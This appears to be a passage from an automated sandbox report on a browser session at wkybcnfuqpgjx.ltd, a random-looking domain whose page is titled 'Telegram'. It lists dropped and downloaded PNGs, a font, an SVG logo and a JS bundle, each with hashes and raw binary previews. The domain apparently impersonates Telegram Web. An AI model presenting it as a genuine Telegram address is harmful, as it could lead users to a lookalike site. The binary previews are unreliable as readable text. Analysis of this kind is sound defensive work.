                                  Reputation:low
                                  Preview:.PNG........IHDR...c.........P......*PLTE..........................................b.+`....tRNS......"'.8?FM.."....)bIDATx..[.o#..l.3....I^&.1$..L9..,.e%/o4>...+e...H.c.I.p4=R&1..E.2....T...nW'..e7..z.....H..Y...,.....i!..]0Z.~..h...U........b.6U...0.%#...GF...GR....b.../.a..5.m......E.H.'.....>.=......U.l.........7a.E~E.J.%.....]0Y.~1.O...b...y<..n@...b...*q.$.7..q.O..."V.?....+.0.#%...;.4.Jzq.......E?zD..W..>1gY.?...nL.....gb0....E.1j...1.%.b.x.~.:..d.=...hT.....P..B.L.>....b?k'rvc......8....S6..6.7E..1..fo....cF.IO..o.....-......u.3S.2S$...{..GM.=..3../.}%..1q..#..59..FZi........!r..rr...Y....C~(..I1.SF..IC.i=l......... ..1.a....>.....0..K....I!...bQt...p....S...z....8DF..K.sVn..K.CAb*.U.#..P.R.{.7D&k..b.U.d/..cR.e........I....\..=i..g'...U-...R..l5YZ...".&........9......'..?29....4....xUd..._.......y.+.m....}..Q.l?..7e..h...x.h...k/.!...z..._...[OK,../t.............C..Pf..!t..d...."..!..\z.Rm. H.q.)....j...X.1.)CHJxY...4.......-X.o.M
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4560
                                  Entropy (8bit):7.873929632272138
                                  Encrypted:false
                                  SSDEEP:96:S7AFqtVv2LS9zlnCgLJGj31c5HwvazMvKX7NB0yjsBDSruI70lV+u:y5XwUlCg1g31clWsMvgNSyezg0lsu
                                  MD5:55053FB98BFD44A2AC156472D3E53A44
                                  SHA1:B48F542647F6DCD37160FC8DA02735E9DC8C585F
                                  SHA-256:89CF4B13F0FCB92029E73BD4304CC313C2BBFF866E323B6E33F8FD6B9B57E3EB
                                  SHA-512:8451EC170BBB57A8630A085598C0FA98D1EC1BB21333861A0189268948D15DCFE25E683B57193E8EEF9D3E20B4046A3C2EEDE2695C702EB32D39B5841E1E7492
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.d_.O(.ah#M).\c.Q*.gn.P).fm.Q*.X`(m=.W0..!....fm. +.M&.Q+.X'.......bi..'.Q).ip.<C.R+.ah.Q*.jq.O).N'.bi!X1.P*./7.kr.]d.I"(U6.O+.................................D.h@.c@.b.ip...@.`@.`.dk@._?.^6.Z>.]=.\.^f<.Z;.Z.^e.W`9.Xyyy9.X0.S.PY6.V;.X.Ya5.T-.O.IS.S\7.T.MW2.Q7.S.BM0.O(.J.RZppp-.L5.P.;G.CN%.G.LT+.K4.O.FO*.I.3@+.H!.C'.F.9E.$5..I.EM&.E.@J0.I.-;.2?$.C.$4.9Cccc#.A.&4.(60~G+.D.$3!.?.%37xJ.4?.'5..=."1]]].*7.!0..;*{B..:.7?..-..9+vA.~:..%.,7..(..+..-.&1.y7..))p>#s;'n<..&.t6..*QQQ.."..$#j9..).p3..!&f:.&0.."..#...%b7....h/.....!.d0...!]3...EEE..".`.!Z2.#+................[(.U-.......V'.......Q'j#)...&B.687.L#....G ...H$'*2,h.....r..()(.8.-&&...&&&H..$$$6..""".&# %. ...O.."...% ............!........9....................................................................(.!<...ctRNS.....%-7=GNWcbccgfix~~~..............................................................................u.....IDATx...k.%.]..o=...{..ag/f...\.\.....DQ.^......1....!.A#,d.,f.!.$b
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                  Category:downloaded
                                  Size (bytes):296503
                                  Entropy (8bit):5.5773634656064175
                                  Encrypted:false
                                  SSDEEP:6144:MHjJYD09b9rmTRCRFH8iQ8RDmMz0cuC1WbBBcrQqzj:ajJYD09b9rmIPci/RdzL1W9BcrQqzj
                                  MD5:A04BC08436674F0EBA06D5C190DC6FE5
                                  SHA1:3D0A8DBECECD918DA43706976766E246262D254D
                                  SHA-256:4C70083F389A2FAFC6A5F3C35179243623B4416CAB07A1C6CE08D3F7C1DDB2AE
                                  SHA-512:D9E2D1E67443393E0AD97EE1A6073865CD7FDA9C47E2A8AF36B18DA07D4E3E451F69BFA55BB43CCC9AEC31CF4D8CE8D78400B3A88E6DB91B8B2C6C0B9815BF07
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/main.d54bfa037348b154a941.js
                                  Preview:(()=>{"use strict";var e,t,n,o,r={4875:(e,t,n)=>{n.d(t,{px:()=>M,eZ:()=>N,Ar:()=>F,PH:()=>O,Hn:()=>x,Ru:()=>k,eu:()=>L,iB:()=>P,fj:()=>T});var o=n(1481),r=n(1182),a=n(9705),s=n(4487),d=n(4235),i=n(7836),c=n(2393);const u=150,l=5e3,f=new Set(["destroy"]);let h;const m=new Map,p=new Map;let g=[];const y={chats:{},users:{},documents:{},stickerSets:{},photos:{},webDocuments:{},commonBoxState:{},channelPtsById:{}};let b=!0;(0,s.wr)((e=>{b=e}));const v=c.bs?new BroadcastChannel(o.rLF):void 0,w=(0,i.Fe)((()=>{const e=g;g=[],h?.postMessage({payloads:e})}));function C(e){g.push(e),w()}let A,S=[],E=[],I=!1;function k(e,t){return A=e,b?(h||(o.Oig&&console.log(">>> START LOAD WORKER"),h=new Worker(new URL(n.p+n.u(3559),n.b)),function(e){h?.addEventListener("message",(t=>{if("redirect"===t.data)return void window.location.replace("/telegram/index.html");const{data:n}=t;n?.payloads.forEach((t=>{if("updates"===t.type){let n;if(o.Oig&&(n=performance.now()),t.updates.forEach(e),o.Oig){const e=performan
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6110
                                  Entropy (8bit):7.941366960374876
                                  Encrypted:false
                                  SSDEEP:96:njC48ynpYtUkWBNw8EwXMEFxoTxrCYrc0gm+6hTYwrNiMA7RljXkbIxakN:n24nY0mGAxrCYJgmHTYwrkMElkK
                                  MD5:7DBCADA0A572B03519728BBCC0B94D62
                                  SHA1:EF357BCF792FEC54FB4CAD73085FDE508113F3AA
                                  SHA-256:EE5C0468EC8FD5275510ACB47CD38C9BDF35F1D6D4D9D982DF07D73096E9F500
                                  SHA-512:1DB531ABD3A22895D06F1BEBD7E0FB7437D2AFABB57E80FC4B2FF991521C0A3D29D260415D9B4955EADE9BF9EAF39FA2BFAC2830BA5C6E117A0BD0BF3483164C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.CGh...orj...jng..f...twg...rvf...KO.mqt %.(..uy.6;g...lpg..u.../3g...nq.x{a...ILn $`...pt._cl."a...vyh...jn.txg...nqh...wzl.".x{.ilm.#`...AE.Z].im.bg.GQ.di.]b.DN.Y^.AJ.dg.]b.U[.`d.CM.BK.PV._b.BK.=G.RX.LR.V[.?G.AI.vy.AI.HO.KQ.@H.=E.;D.SX.DK.TX.?G.<D.DK.?G.9A.JP.?G.=E.>F.LQ.>E.<D.9A.6?.:B.=D.;C.GL.>E.6>.9@.@F.:A.KO.CH.7?.5=.6>.5=.9@.6>.3;.;A.4;.29.2:.5<.08.6=.18.:@./7.07..6..5.5<.-4.28./6.,4.-4.8=.+3.39.,4.*1.+2.)1./6.-3.+1.6<.(0.17.'..-4.'/.*1.&-.6;.'..,3.$,.%,.$+.(/.#*./4.$,.").38."*.").!(.+0.-2.27. (.&-..'.#*..'. '.)..-2.37..%..%..%..$..%..$.-1..$..!..&..#.."{04. &.'-..!.#)..!..!.&+s04..$.&+.. ..$i/2s*.}%)....."a-/.....#v"&e'+q!%y."Y+-......n."P+-}..k..H*+s..z..A)*N#&u..f..o..8((e..<"$0&'_..)&&%&&1 !#$$"##.$#"!!.#". .."!......................qu.hl.mq.ko-q.....1tRNS.....#"17BGPUX_cegfwv~...........................FG.C...\IDATx^..=..0..Q..B.........ti.Y....w..........X..3s..p+.....,j.mGD.q....[-.S...[..............HC.W1......^.`.Y...(..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, ASCII text, with very long lines (3707), with no line terminators
                                  Category:downloaded
                                  Size (bytes):3707
                                  Entropy (8bit):5.256897796455359
                                  Encrypted:false
                                  SSDEEP:96:HEL4G+g5CAnSoPswQQa13poB5RGEWnx/IJ:ksOCASoPsKa5CBrenx/0
                                  MD5:B9A491EF8EAFA4320371DB535F606B99
                                  SHA1:B474E4384921E23E1FCC866100FA22263A2C4CF2
                                  SHA-256:46ED00DC733B6B99257FA4AC611C8B54B0EA68DA6B76CF2A0E09ADCD9DB85AEC
                                  SHA-512:0A56C08AC2C4C2A6956961633E493889795F9D995B1181C6073EA7880E2822DDE00FA50B6A1EF72F616B0DF1A2B18F203BE816AB07AAE4F411C6D2ABA5696746
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/
                                  Preview:<!doctype html><html lang="en" translate="no" class="notranslate"><head><meta charset="UTF-8"><title>Telegram</title><meta name="title" content="Telegram"><meta name="description" content="Telegram is a cloud-based mobile and desktop messaging app with a focus on security and speed."><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no,shrink-to-fit=no,viewport-fit=cover"><meta name="mobile-web-app-capable" content="yes"><meta name="mobile-web-app-title" content="Telegram"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Telegram"><meta name="application-name" content="Telegram"><meta name="msapplication-TileColor" content="#2b5797"><meta name="msapplication-config" content="./browserconfig.xml"><meta name="theme-color" content="#ffffff"><meta name="google" content="notranslate"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; connect-src 'self' wss://*.web.teleg
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5210
                                  Entropy (8bit):7.9359920829997295
                                  Encrypted:false
                                  SSDEEP:96:wn9r3I+mS3D8WuhxgPw+ZjAr5jyNBk+4gv1BRyZgJeh+Wk2Ning0pKSrOLHz:w9MdSVDZiyNW+PBqgEh+v2MZpKPLHz
                                  MD5:3BD35E47AC3FC115FA96FA65F786AE14
                                  SHA1:94557FA4591AAF883B0B7B6F8FFB90A5A239EE77
                                  SHA-256:11BFBB0670B8C66E46225AFA1DBEE0445CBD3C4DDBA40B8605B465306842650C
                                  SHA-512:1607CA84113177C56F5D1A0799096C1C181074F99F4B808BF71AC21B12D672BAA4036A8D5D830BB4CCADDB88FFAA65F56F1B08E5E0D89200964C0CFFBF736F8E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.:/z'..v.ti.{.tj.zq.ypx'..zp.{.|r.x.zp.}s.ul.wm{)..y.ka.9,})..K>.F8.dZ.#.....TL......r ..z.-"z(.w%.y%.y'.y&..wm.vz&.t!.{)..Q=.O<.K8.D0.B0.H7.gU.bN.M9.H5.C/.=).>*.\H.WB.UA.P<.H3.E0.C..A,.?*.=(.9%.7#.6!.9&.E4.=..aW.oc.Q=.M8.J5.:%.4..4 .2..?/.9*.YC.T>.K6.=(.eX.5(.+..WC.$..3$.*..5$.<*.O:.-..4!.0..YD.ZD.<%.4..-..#..*..U?.M5.F..A(.=%.u... ..|l..|..............................................lZ...............................................................5.............................................................................................cW.wl.......ob.hY.....................Pa...........;..K..........E..T...........&.[0.bR.|".XG.t......s.;.j..+.........,..1%.$../#.*.z%.z .r..._O.]O.XI.vh.qb.eT.VD.P@.WJ.l\.]J.VB.pf.}s.xm.k`.z ......,tRNS.."5Udk..@..........c....}c~c~....gO1"@..I..%....IDATx....R.P..a;.. ..m......(....V.(..R....1q&.PD !..v.1.j[....'....;k..h4..F..h4..F..h/.W>.c6[,V..f.Z-..7../.6.p......aeL..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4002
                                  Entropy (8bit):7.915808402551096
                                  Encrypted:false
                                  SSDEEP:48:hrkROtxoMWtsYl1ojD8sA4nvZWCnMMPxDwBjPDDyQG21PBeisUOcXVT0ECMzFhit:4Ix1WtsYl6jDm4RZZUtHhGiWUOOCyhW
                                  MD5:9B0AB2B7A62D57205DB14C771183BA02
                                  SHA1:4A2C5A8D783F413210C6C951F61D493A145FBC14
                                  SHA-256:298BC8A5E26302EF3BB48D3397A46412BBD61FC19AD85C44A17F5BABCBF532D0
                                  SHA-512:70F5150518CB3E9D718DAA3703B7C01F098BBAB7A999924C4EC2BB0D236524576805158D33F05CF0534239A8334B9F25D0EBF34649243EC0E7752CC3BF009263
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.wN..fd..g...k.qf....Fg...p..$..*.6jg...ig...x.r....T.n..6f..i...rg...h.sg....h.jg...s.s..fc....:..^..)..)..,..9..8..8..6..8..5..7..5..5..8..2..C..4.....1..4..L../..>...../..,..Q../..+..>..[..).....,..'..'..9.._..L..%.....#.....+.!.r.d...#.S.0.>.....k.#...$.....'.S...C.f...5.......%....`...B...'....N..[......G....%..4........d.."..#...|.p.|.||Gf|..z..w.esdQo.~l../9.3BekG.3E.3D.3D.0B.0B.(3..@.6P.0AMdl.,>.;_.Co.*;.(:7_..,<. ,.%7.)9UI.."3./P@O.cBy..0&V...!%U.8Up..0-Q.....%4#S..W.r6e.Z.. 0!Q..%3..,.O...).M..M.....M.."/..'.R...+3B..J...&.....$.H...+N2i.F...!#Fr.F...'e(U.. .I..D.z.@..(.. .B..@..@..>..?.y.&.>..A........=... .;u.;.q.$z. C%Z.9.(/h.6k....9..7.m...3..5..3~x..q...-..0}f.../{.,sf...&..)k^... ..&b. U..X..h.x....&tRNS....,0?BUT`cccftv~.~..................A.!Q...+IDATx...K..F....II...r.{.cx. ...Kd...Y.L.=z..U.P..H...Hlo...@-Z?J.X.V..j.Z.V..j.Z.>'.m.....k....o`....5...lx.~..8...@..wS.k...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:SVG Scalable Vector Graphics image
                                  Category:dropped
                                  Size (bytes):932
                                  Entropy (8bit):4.808229443296337
                                  Encrypted:false
                                  SSDEEP:24:t41lDGwGlit3rBx5syIzafJoLDxyGqV5s1EM:ClazlmOySuQxyGqVqb
                                  MD5:67EDAAF1408D2278DB9F10FBC5690ADA
                                  SHA1:5CF2B6BA80881A1A8D48963A094D0D410022932A
                                  SHA-256:ADE1DDEC66F6E98E30D8A56B01E7DD9D2C84A8F4DAC51BC88D2AB5BC6E5D1A62
                                  SHA-512:0B6BB33DFE2808BA5EE926E0452F879421C1A102B05E43DD01B6DCCAD5393082C5E2C9D675FB203A0EB5E1FAE4BE244A12EC4F482AF7016B0F5962826D785A9B
                                  Malicious:false
                                  Reputation:low
                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 120 120"><defs><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="a"><stop stop-color="#38AEEB" offset="0%"/><stop stop-color="#279AD1" offset="100%"/></linearGradient></defs><g fill="none"><circle fill="url(#a)" cx="60" cy="60" r="60"/><path d="M23.775 58.77a3278.85 3278.85 0 0 1 39.27-16.223c18.698-7.454 21.3-8.542 23.828-8.58a4.995 4.995 0 0 1 2.977 1.103c1.058.9 1.38 1.47 1.47 1.972.083.503.075 2.07-.015 2.963-1.013 10.207-4.86 33.78-7.088 45.225-.945 4.837-2.805 6.457-4.605 6.615-3.907.345-6.877-2.475-10.664-4.86-5.925-3.728-7.905-5.1-13.65-8.737-6.653-4.2-3.916-5.663-.128-9.436.99-.982 17.415-15.974 17.662-17.34.21-1.2.286-1.357-.254-1.897-.548-.54-1.2-.473-1.62-.383-.6.128-9.645 5.85-27.15 17.176-2.685 1.777-5.115 2.64-7.298 2.595-2.4-.053-7.027-1.305-10.462-2.378-4.223-1.32-7.575-2.01-7.275-4.245.15-1.163 1.814-2.355 5.002-3.57Z" fill="#FFF"/></g></svg>.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Web Open Font Format (Version 2), TrueType, length 11016, version 1.0
                                  Category:downloaded
                                  Size (bytes):11016
                                  Entropy (8bit):7.981401592946327
                                  Encrypted:false
                                  SSDEEP:192:Tysuo7z1NVoTUYAKVOO7YVxRwHQUXFI5xoBwH9f4d9QFmOfiS:TvdvVoTSjOYR4QUVIgBwpFLaS
                                  MD5:15FA3062F8929BD3B05FDCA5259DB412
                                  SHA1:6FF06A34F68AD0324DDEC1BBE4D453C959178B36
                                  SHA-256:5D1BC9B443F3F81FA4B4AD4634C1BB9702194C1898E3A9DE0AB5E2CDC0E9F479
                                  SHA-512:07E96D7520B4EDE158E77BEF10A01A33CD8BE7D263FE6900F89C023E65E4A63570E8A442DEC2E96030FB563B25610005A748D48F9330FD31EB91B37D1003D376
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.465390c6e54c60f4a15f.woff2
                                  Preview:wOF2......+.......Tp..*..........................d..d..|.`..l......&..r..6.$..`. ..t. ./F....R..N..Px......0.....t.%..6_.Mq.;...]l...N......<..s.|.}......s@s._1..b..`.--)Q-.Br.Kh..J...e.b.f..fd.0....jn..Z.*v.@N...L.J:)i..h.....?....o"0..P.....T.@..&..|....(.v.sZpI......?.HxT{~N.(.;........W..U..X.......LQ...'i........q@...c...L.+ ...J.W....E..u...(..f....e.~O.......sXk.FB`.Q<h........1..|d!.YC.......+.....$."E.D..(..@ P..`..H.!.`...0k..i....!z..}.N.p.@;./8.....H..E..<.....d..&D...n.Z.X.I7.H.-.e-if..g.....,.5.W...;+.{1....V/....Y..-...b%..S..HF.r..n...5..... ..0p.1..........D..#N....nP.N..=...3e......).o..!.F..3.G&L.1k...mxm.m;v....._}..B<...I..../pAp.7.l...\........I9V...U..4`..+6...b.y.g%AZ.......... .0..../[..KX..V.v.c....m.`.{.7..........})#,b..@k..b....c.dl..]2....L.J..c........E.......C.).%E%.f..g...p.X....b.o.\.}...,.....0.6..b%.J....A.Fd H3q>6.."..kA..l.56..|...2R.].P.....5.c...y.h.X..b.....m`.....Z.."...(A.9.].X."...Z.i...+6.(&....m'..v.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5249
                                  Entropy (8bit):7.8424072830626
                                  Encrypted:false
                                  SSDEEP:96:IsE6t1/uBoy+gChS1XJviQ/1LPRvsQfn7sgm+JPfQicDRqB+DoDbe:IsEA/1rgf1XliY1pPP7lm+JGqBrDbe
                                  MD5:BC672C5E26C05DE0D453CB60BC7EFB0F
                                  SHA1:CE0E37D6219122D9AFA315B353450B2FDADA1B0A
                                  SHA-256:825BCBB83DA5EFCCDC75B15F043BC2AE104DB3727CE399111678D560A56BEDB2
                                  SHA-512:59A7483709C5369B78937A61AA203084C5A95609E32143AF643631D9CBB785917D3656BC00439818C0CF91CDD514FD58B18A971E3039A1DAE86105D3E3D619DE
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLp/&j.vt..f.rw..l.xp.|u..p.|o.{w..x..x..x..p.}m.yi.uk.wl.xm.yw..a.mb.qV.fT.cW.iJ.]C.VN.]e.uY.kK.`B.X=.S5.K3.IZ.n0.I,.D,.BB.R0r=P.fJ.a4.M-.F*.C%.>#.</|B3pBKvVV|_<.U9.R6.O&.?!.:..8..6g.oB.[?.X..3%q7@.Y.Z$.^%.Y".i*.{-B.[..07.R2.Lv.....n.}U.kd.x.......................z............y........................................................................................................................................................DD.....&&.99...zz.."".[[....hh....ss..OO....//.%%.............................{{.gg.WW.aa.JJ...gg.pp.yy.pp.##.>>.LL....77. .mm.........................WW.55.LL.........................!!........................v..y...............$$.... ......y.....x..t..o..m..e..e..n..r..m..m..l..k..l..m..j..i....=f....tRNS...:Zev.I1...............................c........................~.....................................................c....................~~...................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4744
                                  Entropy (8bit):7.938729169676506
                                  Encrypted:false
                                  SSDEEP:96:Yu6Ut04HFwRad4DoMOaGwRI7gYlSKcDtXc3G7fjYMru:Yu60BFwQWyaGwRkBUKcDtXy4LYx
                                  MD5:71C684A325E9FF8883FE9B7192721BCD
                                  SHA1:1A0F78382AB565044A65DB312AC27909239695D0
                                  SHA-256:F81BDF2E3EA6131FCB751A07343C8D043B6522262BC7FE20A8ACCA4D2A427069
                                  SHA-512:95AD179849F081D0B00AA2E7B4770AB0F7E72385F067D18D6ADD28F3806F7FB2D2F2AB33248609865EFAC5F37C1DBFF7CF03DE36A10EAD6755E82DC61D538AD2
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1ec.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.}..ln.x|.st.{||||.os.~..vz{{{}}}.x{.RW.pt....17.~.....uyrrr.ae.vz........ .nr.BF.~.uuu.tx....y}xxx.lp.x|www....~..x|.puxxx.x|....EJ.}.vvv.nr._c.................................................................................................................................................................................................................................................................~.......u{....|.....jp.x|....vz.rw.ot.jp....qu.ek.ah.ko....W_.Ya.ej.[a....in.^c.T\.MV.PX.MV.LU.ei.LU}}}.KS.NU.JS.KS.[a.IQ.SY.IQ.HPyyy.GO.[`.FN.GO.EM.@J.HP.KRttt.BK.CK.QW.@H.AI.TY.?G.IP.7A.<E.=E.AI.;C.7@.DK.9A.7?.09.8@.IM.<C.4<.8@.4=.2:..7.3;.@E.7>.08.07.-6.%/.)2.08.,5.*3.*3.3:.)1.)1.;?.'/."+.&/.'/.&.."*..$.07.$,..$./5.$+...."*.!).....&..%..!.........I...1tRNS.....$127>@OQU]cceefgjyz~~........................S......IDATx...[.\.]....r.s...^.1.np...V.jC.E".R.Ux..%..&.<4.C..<D.....O\...E....5q.5.(...MS.......3s.....7...k...+_^.+.t..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4133
                                  Entropy (8bit):7.913572821395387
                                  Encrypted:false
                                  SSDEEP:96:1eu26bW6vKqVlb7FMYszY6rS5QYK4ycT+L+KMCSlAdkZLA7rqMz:1eu/L/Db7hs+e9+KMCpdWLHMz
                                  MD5:18A317E329781DD1CF420AC61E6013DE
                                  SHA1:EEB4003DE29AB5803BB2903400D2785EB1E637E1
                                  SHA-256:776EC99EF2C9609FC30D867D02DA55EE2C41B11CCD4017DA27EBB028CA1B992D
                                  SHA-512:0CA4442CD32BDE8A2425E6316F74EFE164AFCD159E5CF26E92AD51721BAD1F3ED8570772D16A601DCF97453CD00C8AFEA50942FB162A593A860AFCC427DDB30C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ed-1f1f9.png
                                  Preview:.PNG........IHDR.....................PLTEGpLeq._.1i."_k.i."gt.g."<K.gs...2?&^.)s%6~i.!`l.i.#w....\i."am.ly.i.#<I.gs.b..]i.j.$jv.h."am.k.%kw.]i.o.(b..^i.0?z....................................w....g......w.g}r..Z..}.s.k.D.njv.eq.[p..u$qqi`m..KQ]j.!.[:.Y\h../O.4RWf..4Q.'P.,E.3Q.2Paq>.2P.1OXc..-J.MSQa.KuN.0N..M.0L..KQ_.t[N.,K.8QK]..+I.%>..I..2.*H.(G.-Ieb)LZ..'FCW..&D.;F.+EEV..$BUVk.%B."A..7&rG.)CCR.. ><Q..$A..>..<..<^>.?N..&A..:. <<\D.([7L...9..83J..!;8J...7.%=..6..-m;H..)..5v-s1F.8I~EP5..5..33F...7,D.. 6..2..1."7..0..3WA*&@.&@....&?.%?.)?...-%?...3*?.J1.,@.$>...,9?g..,"<...+..0.?...1.:. :..9.&:...).8.|.-.6..6...&..)|.K..+..'.9..4.6<(.3..3.s.*y.)$3w.2..1.V.b.0...#.3..."...{.$o.%.-..,..,..,.0 y.*..*..*..+}z...(.s..h.!.(..'..&..&..'q.%..$.i...#.."..!...z.!.a...........(.O..............|(....s..i..\.../...&tRNS...!(6<LUabccggwx~~...........................IDATx...Mn.@....3...."@....s.d..8.K..%.@,.U !.TQe;.].?4.ZV4.T..l.,yvO..Lp.\....r.\....r....y.....6..=......'.L.R......~v]...._&.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4460
                                  Entropy (8bit):7.810940342424677
                                  Encrypted:false
                                  SSDEEP:96:76hg+QfWj1dkr3lss706Pwehgx2renLBJwsbkvW67cGeNyya/KJJYGXm:u8rVdQ6Pwehe5L/X4vAGeo0bY4m
                                  MD5:0AFFC5B72BB4F04CC949079A77423179
                                  SHA1:8D3101B3EA048983CE1370C3C879854A0223084E
                                  SHA-256:C4D6A91D5237DB7689D3256DC83C367256B635346C592FA5CBC3B7358066119F
                                  SHA-512:780779E8B52D767DF5C5F0AA8D64AFD34520B11E53ACA5A28C90D902F52963719BE5CFE031BA08403492CD2AEBABFEC9DBE3FAE4C5AF016739F2E63C82AC6EBF
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1e6.png
                                  Preview:.PNG........IHDR.....................PLTEGpLh...qx.hpg...emg...nvf..g...CM.nu. ,G(C..Rg...fmg.....p....=.&1.muh...CKg...nvf...gnk. a...qy.fmh..i...qy.X`.emb...=G.......................................z...qy.lu.hq.bl.fn.\g.ck.^gd|..Va.^f.Xa.P].Yb.JX.DS.NY.R[.FSTo..>M.GR./:.KT.>L.8H.0=.AN.3C.1A.3D.3C.6F.3C.1B.1B.BMHd..6G./A.1A.=I.+:..?.&1.0@.-=.5E.+<.+;.&4.8L.-=.(9.1@>\..8U.'7.%6.+:. ..#4.;^..(.%4./C.!2.)7.%4../. 0./C..-. /^?i.&4..%0P..!0..+..*..N.....*k3XCBs..'..,."/..)..&...0Ez&H.."/..$%G~..#$F|.....!#E|.H...*.. ..#"Dz..&..,P1[!Cy..&2<n... Bx.H..Aw....@w.D~~.(.. .?u....>t..%?0[.Az[%Hu.8.<sw.%.;q....:p...q.$.9oy. .>z.7n'0b.6l.6r^.:...m...5k.4e.4g.4a.4jG.F0(R.8r.3iq...2h.2gz...0[.1g.2m.0ff.../er...-Q..d.-S.+T.-c..j.,a/.Hf...+a.*`.*_.)_M.(.(^.)e_...!R.'].&\.%[.%Y.%`.$X.#Y."W.!W. R$.1..L..E..9..=..<.......tRNS.....(+<>OUacccfvv~~~..............................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4885
                                  Entropy (8bit):7.840646616766408
                                  Encrypted:false
                                  SSDEEP:96:ZY5liNEc3IYSUf3qVwLf9RdO8Ctdrt/+MR0z3klDl:ZY5liqc35dqVY97jCXwMmzklx
                                  MD5:B202A85B77803EB79DBA4B7B43DB2C02
                                  SHA1:E520DF3DBDBE37E1A38A9FEF5E4906AD9B07DE89
                                  SHA-256:0A306AFED8B4A0BF439894949EE6A0FC4AD4FD920ABE476FC21C0234C6BF1AE9
                                  SHA-512:406BB50C98748502FFEF510F9B01EBF590A77CF7318E97FCFB79DB3C02871978D2C2D5FB324259A832420F554938171F8A7BDADAA4CA66D312B08534D7A5EFD8
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f9.png
                                  Preview:.PNG........IHDR.....................PLTEGpLLq.Lr.Ou.X..b..h..m..n..n..o..p..q..r..s..s..t..u..w..w..w..y..z..{..{..|..}..~.....................................................................................................................x...........................................................................................................................................................................}..w..s..p..q..q..t..v..}..|..y..u..i..l..n..c..W~.Ty.Os.Mp~KlzHhuEcpA_l>\h<Yf?]iIdoC`mB^j@]i@]iC`lB_kA^kC_lC`lRr.Xy....u.....w..k..z......a...*_O!j_1.w._..Y..\g^ONF/#.51/H<4/B&6U2.M.+]).>.DgB.!.}.zj.]u.\.t....@.$j.93q.............d.a{.yszpdu[RyG%g...................v..............................................c......~.........~..|..w..m..c..a..c....Y.....tRNS.~...............................................:d................jU7%...o>....................................................................................Icx......cX.....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5410
                                  Entropy (8bit):7.933774995723551
                                  Encrypted:false
                                  SSDEEP:96:LTtfUkgrrwh/3Q4Gln1whxVrpvtSeSMKwXEDlYnN1XnvGDjW+XwwZBvSeUqPpQb5:fxUkgrrwhI4+n1wh7rpvkeDEJAnuDK+o
                                  MD5:0582218F8A4C622082B5D630787998C7
                                  SHA1:67A567459FB76206E65800D1D9721D09E225BB86
                                  SHA-256:E3F55091BFF7BD8F452B8327BE56B9D54ABAD3CEC9C868FEBD8A84F362EA284D
                                  SHA-512:85885E1F1FC0875751BE58073C7539E1D4140E30DC255BCE1624A742AE64430D95C4433F3B47CF53D211E5384CFEAF9CFEF9400A0763A87F335861EA47A7BC6D
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1f3.png
